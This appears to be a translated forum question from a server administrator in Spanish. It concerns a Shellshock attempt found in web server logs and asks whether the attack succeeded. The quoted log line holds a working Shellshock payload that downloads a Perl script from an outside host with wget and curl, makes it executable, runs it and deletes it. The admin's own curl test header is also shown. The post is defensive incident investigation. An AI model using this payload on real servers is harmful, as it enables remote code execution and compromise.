Estuve revisando los registros hoy y noté lo siguiente:
62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/bo.pl;chmod +x /tmp/bo.pl;perl /tmp/bo.pl;rm -rf /tmp/bo*\""
Según tengo entendido, este es un intento de analizar la vulnerabilidad de shellshock. Recuperé el archivo cargado bo.pl, que contenía lo siguiente ...
<html>
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://192.168.1.1/blocking.asp?cat_id=78">
</head>
<body></body>
</html>
Ahora, como lo entiendo, está utilizando la técnica de actualización para mostrar una página de bloqueo de asas de algún tipo.
Estoy seguro, dada la evidencia de que se trató de un ataque malicioso. Lo que me preocupa es que el registro muestra 13501 para la longitud de la respuesta. Pero cuando intenté usar el encabezado de shellshock simple para probar la capacidad ...
curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/
Solo recibí la siguiente entrada de registro ...
71.121.200.199 - - [26/Dec/2016:18:14:11 -0100] "GET / HTTP/1.1" 200 22 "-" "() { :; }; /bin/eject"
También fui a revisar el directorio / tmp y encontré dos archivos que no se corresponden exactamente con la hora de los registros pero parecen sospechosos, ya que se trata de un servidor sin cabeza y parecen estar vinculados a servicios de escritorio remoto de algún tipo.
-rw-r--r-- 1 0 0 8 Dec 25 03:46 httpd_lua_shm.2693
drwxrwxrwt 2 0 0 4096 Dec 24 18:42 .ICE-unix
Entonces, mi pregunta es: ¿esto parece ser un ataque exitoso debido al hecho de que los bytes en la respuesta son tan grandes? ¿Hay algún otro lugar en el que debería estar revisando, además del historial de bash, para buscar pistas sobre lo que sucedió?